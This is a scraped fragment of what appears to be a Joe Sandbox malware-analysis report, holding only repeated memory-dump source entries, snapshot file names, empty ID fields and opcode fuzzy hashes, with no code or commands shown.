                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1673190188.0000000000435000.00000040.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_3e0000_hx0wBsOjkQ.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1673122276.00000000003E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_3e0000_hx0wBsOjkQ.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1673122276.00000000003E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_3e0000_hx0wBsOjkQ.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1673122276.00000000003E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_3e0000_hx0wBsOjkQ.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                • Opcode ID: 5942bd499fb4065e238f13ce8f337e931f9b282e7074cf315b73fdaade49b93d
                                                                                                                                                                                                                                                                • Instruction ID: 4faf5696e314d919df301803cfefa09752727b8c99f04b46b902a9172314b44b
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 5942bd499fb4065e238f13ce8f337e931f9b282e7074cf315b73fdaade49b93d
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: DE01F9706442829BD314CF38CCA056BFBA1FB96364F08C79DC4568B796C638D443C799